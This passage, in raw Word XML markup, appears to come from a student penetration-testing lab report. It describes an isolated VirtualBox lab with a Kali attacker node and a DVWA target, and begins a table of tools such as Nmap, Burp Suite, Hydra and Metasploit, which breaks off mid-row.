    <w:p w14:paraId="00DE8376" w14:textId="77777777" w:rsidR="00097425" w:rsidRDefault="00097425" w:rsidP="00D23F0B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29973C98" w14:textId="77777777" w:rsidR="00097425" w:rsidRDefault="00097425" w:rsidP="00D23F0B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6138A500" w14:textId="77777777" w:rsidR="00097425" w:rsidRDefault="00097425" w:rsidP="00D23F0B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2178876E" w14:textId="77777777" w:rsidR="006C423C" w:rsidRDefault="006C423C" w:rsidP="00D23F0B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="588670E0" w14:textId="77777777" w:rsidR="006C423C" w:rsidRDefault="006C423C" w:rsidP="00D23F0B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25DD9280" w14:textId="5F526D29" w:rsidR="002D1732" w:rsidRDefault="00000000" w:rsidP="00D23F0B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="317F5A52">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="564AFCD7" w14:textId="5F526D29" w:rsidR="007C5D7E" w:rsidRDefault="00BF08FB" w:rsidP="003021A3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc228099271"/>
      <w:bookmarkStart w:id="6" w:name="_Toc231851424"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF08FB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>arget Environment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="62BD2E87" w14:textId="47FDC47E" w:rsidR="004C6E9D" w:rsidRDefault="00B04D5A" w:rsidP="00BF08FB">
      <w:r w:rsidRPr="00B04D5A">
        <w:t xml:space="preserve">The lab is set up as an </w:t>
      </w:r>
      <w:r w:rsidRPr="00E7419C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>isolated VirtualBox NAT Network</w:t>
      </w:r>
      <w:r w:rsidRPr="00B04D5A">
        <w:t xml:space="preserve"> where the VMs can communicate with one another but are isolated from the outside internet. This configuration provides </w:t>
      </w:r>
      <w:r w:rsidR="00B955BD" w:rsidRPr="00B04D5A">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="004C6E9D">
        <w:t xml:space="preserve"> realistic </w:t>
      </w:r>
      <w:r w:rsidRPr="00B04D5A">
        <w:t>environment with</w:t>
      </w:r>
      <w:r w:rsidR="002E1495">
        <w:t xml:space="preserve"> two key</w:t>
      </w:r>
      <w:r w:rsidRPr="00B04D5A">
        <w:t xml:space="preserve"> nodes for the attacker to interact with </w:t>
      </w:r>
      <w:r w:rsidR="002E1495">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="00B04D5A">
        <w:t xml:space="preserve"> target operating system</w:t>
      </w:r>
      <w:r w:rsidR="004C6E9D">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAA56E1" w14:textId="0CCB3985" w:rsidR="00B04D5A" w:rsidRDefault="00B04D5A" w:rsidP="00BF08FB">
      <w:r w:rsidRPr="009B3CC7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Attacker Node (Kali Linux):</w:t>
      </w:r>
      <w:r w:rsidRPr="009B3CC7">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B04D5A">
        <w:t xml:space="preserve">An operating system derived from Debian that is used for digital forensics and penetration testing. It is used as the main base for working on all aspects of hacking. </w:t>
      </w:r>
      <w:r w:rsidR="00806332" w:rsidRPr="00806332">
        <w:t>(Orebaugh et al., 2006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CE053B" w14:textId="77777777" w:rsidR="00B955BD" w:rsidRDefault="00B04D5A" w:rsidP="00B955BD">
      <w:r w:rsidRPr="009B3CC7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>Web Target Node (Ubuntu</w:t>
      </w:r>
      <w:r w:rsidRPr="00C170A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:r w:rsidRPr="00B04D5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C48F7" w:rsidRPr="00B04D5A">
        <w:t>An</w:t>
      </w:r>
      <w:r w:rsidRPr="00B04D5A">
        <w:t xml:space="preserve"> Ubuntu server with the </w:t>
      </w:r>
      <w:r w:rsidRPr="009B3CC7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>Damn Vulnerable Web Application (DVWA).</w:t>
      </w:r>
      <w:r w:rsidRPr="009B3CC7">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B04D5A">
        <w:t xml:space="preserve">This node is the main target for any web-based vulnerability exploitation (SQLi and XSS). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB10F14" w14:textId="300D9012" w:rsidR="00A02460" w:rsidRDefault="00B04D5A" w:rsidP="009A67BB">
      <w:r w:rsidRPr="009B3CC7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>Services:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B04D5A">
        <w:t xml:space="preserve"> The environment hosts an </w:t>
      </w:r>
      <w:r w:rsidRPr="009A67BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Apache web server</w:t>
      </w:r>
      <w:r w:rsidRPr="00B04D5A">
        <w:t>, a DBMS (</w:t>
      </w:r>
      <w:r w:rsidRPr="009A67BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MariaDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00B04D5A">
        <w:t xml:space="preserve">) to store DVWA's backend, and </w:t>
      </w:r>
      <w:r w:rsidRPr="009A67BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r w:rsidRPr="00B04D5A">
        <w:t xml:space="preserve"> as the server-side language. </w:t>
      </w:r>
      <w:r w:rsidR="00AE100A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B175C2" w:rsidRPr="00B175C2">
        <w:t>(Apache Software Foundation, 2024; The PHP Group, 2024). (Refer to Appendix A for the VM Topology Diagram).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F54F36" w14:textId="51403A7B" w:rsidR="00E7419C" w:rsidRDefault="00E7419C" w:rsidP="00BF08FB"/>
    <w:p w14:paraId="551CB6D4" w14:textId="03B6BFAA" w:rsidR="00BF08FB" w:rsidRDefault="00BF08FB" w:rsidP="00BF08FB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc228099272"/>
      <w:bookmarkStart w:id="8" w:name="_Toc231851425"/>
      <w:r>
        <w:t>Tools</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="45B19D57" w14:textId="6A5681AF" w:rsidR="00BF08FB" w:rsidRPr="00BF08FB" w:rsidRDefault="007806E5" w:rsidP="00BF08FB">
      <w:r>
        <w:t>The List of Tools used in this project are given below, with each serving a vital role when it comes to Web Penetration on a Damn Vulnerable Web Application (DVWA).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8995" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1608"/>
        <w:gridCol w:w="2564"/>
        <w:gridCol w:w="4823"/>
      </w:tblGrid>
      <w:tr w:rsidR="005923A2" w14:paraId="19B18558" w14:textId="77777777" w:rsidTr="00355E22">
        <w:trPr>
          <w:trHeight w:val="525"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65A3F310" w14:textId="306DA043" w:rsidR="005923A2" w:rsidRPr="002D5F57" w:rsidRDefault="005923A2" w:rsidP="00D23F0B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D5F57">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2564" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DB08BE5" w14:textId="1A5BE45F" w:rsidR="005923A2" w:rsidRPr="002D5F57" w:rsidRDefault="005923A2" w:rsidP="00D23F0B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D5F57">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58F3BD49" w14:textId="01332CD5" w:rsidR="005923A2" w:rsidRPr="002D5F57" w:rsidRDefault="005923A2" w:rsidP="00D23F0B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D5F57">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Justification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005923A2" w14:paraId="6FE7695D" w14:textId="77777777" w:rsidTr="00355E22">
        <w:trPr>
          <w:trHeight w:val="1033"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A55430E" w14:textId="534D6B58" w:rsidR="005923A2" w:rsidRPr="007806E5" w:rsidRDefault="00214164" w:rsidP="002D5F57">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007806E5">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2564" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43FA51DE" w14:textId="4E0D8995" w:rsidR="005923A2" w:rsidRPr="002D5F57" w:rsidRDefault="00C51E57" w:rsidP="002D5F57">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D5F57">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">Foot </w:t>
            </w:r>
            <w:r w:rsidR="000950B6" w:rsidRPr="002D5F57">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Printing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75238D0F" w14:textId="0641E020" w:rsidR="005923A2" w:rsidRPr="002D5F57" w:rsidRDefault="00672EF8" w:rsidP="00D23F0B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00672EF8">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">Discovery and auditing tool for networking to find out what services and ports are open. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005923A2" w14:paraId="57A01B01" w14:textId="77777777" w:rsidTr="00355E22">
        <w:trPr>
          <w:trHeight w:val="773"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BC20ACD" w14:textId="7F68B8A6" w:rsidR="005923A2" w:rsidRPr="007806E5" w:rsidRDefault="00214164" w:rsidP="002D5F57">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007806E5">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Nikto</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2564" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E25113E" w14:textId="33EC4116" w:rsidR="005923A2" w:rsidRPr="002D5F57" w:rsidRDefault="000950B6" w:rsidP="002D5F57">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D5F57">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Web Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F136F42" w14:textId="4B748C11" w:rsidR="005923A2" w:rsidRPr="002D5F57" w:rsidRDefault="00672EF8" w:rsidP="00D23F0B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00672EF8">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">A Web server scanner to detect potentially harmful files, CGIs and outdated server software. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00355E22" w14:paraId="24CCB6FB" w14:textId="77777777" w:rsidTr="00355E22">
        <w:trPr>
          <w:trHeight w:val="525"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08096750" w14:textId="77777777" w:rsidR="00355E22" w:rsidRPr="007806E5" w:rsidRDefault="00355E22" w:rsidP="00E5410D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007806E5">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Wireshark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2564" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BCD2A26" w14:textId="77777777" w:rsidR="00355E22" w:rsidRPr="002D5F57" w:rsidRDefault="00355E22" w:rsidP="00E5410D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D5F57">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Traffic Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38D6D596" w14:textId="77777777" w:rsidR="00355E22" w:rsidRPr="002D5F57" w:rsidRDefault="00355E22" w:rsidP="00E5410D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>U</w:t>
            </w:r>
            <w:r w:rsidRPr="0091270D">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>sed to capture and analyse network packets</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005923A2" w14:paraId="3424DAB7" w14:textId="77777777" w:rsidTr="00355E22">
        <w:trPr>
          <w:trHeight w:val="1033"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3438E216" w14:textId="7D90EBFB" w:rsidR="005923A2" w:rsidRPr="007806E5" w:rsidRDefault="00214164" w:rsidP="002D5F57">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007806E5">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Burp Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2564" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05462EFA" w14:textId="3C0E3DCC" w:rsidR="005923A2" w:rsidRPr="002D5F57" w:rsidRDefault="000950B6" w:rsidP="002D5F57">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D5F57">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Proxy/ Interception</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7084DD25" w14:textId="648D5355" w:rsidR="005923A2" w:rsidRPr="002D5F57" w:rsidRDefault="0091270D" w:rsidP="00D23F0B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:r w:rsidRPr="0091270D">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>he main tool to intercept and manipulate HTTP/S traffic between the browser and DVWA.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005923A2" w14:paraId="58A7D7B5" w14:textId="77777777" w:rsidTr="00355E22">
        <w:trPr>
          <w:trHeight w:val="1033"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="051F292F" w14:textId="77F51A49" w:rsidR="005923A2" w:rsidRPr="007806E5" w:rsidRDefault="00214164" w:rsidP="002D5F57">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007806E5">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Hydra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2564" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="177BA8F3" w14:textId="6C1C5DAC" w:rsidR="005923A2" w:rsidRPr="002D5F57" w:rsidRDefault="000950B6" w:rsidP="002D5F57">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D5F57">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Password Cracking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E0D2094" w14:textId="5E4160E9" w:rsidR="005923A2" w:rsidRPr="002D5F57" w:rsidRDefault="007806E5" w:rsidP="00D23F0B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007806E5">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Password Cracking Brute force login cracker for network login systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00214164" w14:paraId="5C93D49B" w14:textId="77777777" w:rsidTr="00355E22">
        <w:trPr>
          <w:trHeight w:val="1051"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="282A5716" w14:textId="340188A7" w:rsidR="00214164" w:rsidRPr="007806E5" w:rsidRDefault="00214164" w:rsidP="002D5F57">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007806E5">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2564" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B5BBFDB" w14:textId="6A50EA54" w:rsidR="00214164" w:rsidRPr="002D5F57" w:rsidRDefault="000950B6" w:rsidP="002D5F57">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D5F57">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09DC1EBC" w14:textId="295BE0A4" w:rsidR="00214164" w:rsidRPr="002D5F57" w:rsidRDefault="007806E5" w:rsidP="00D23F0B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Powerful</w:t>
            </w:r>
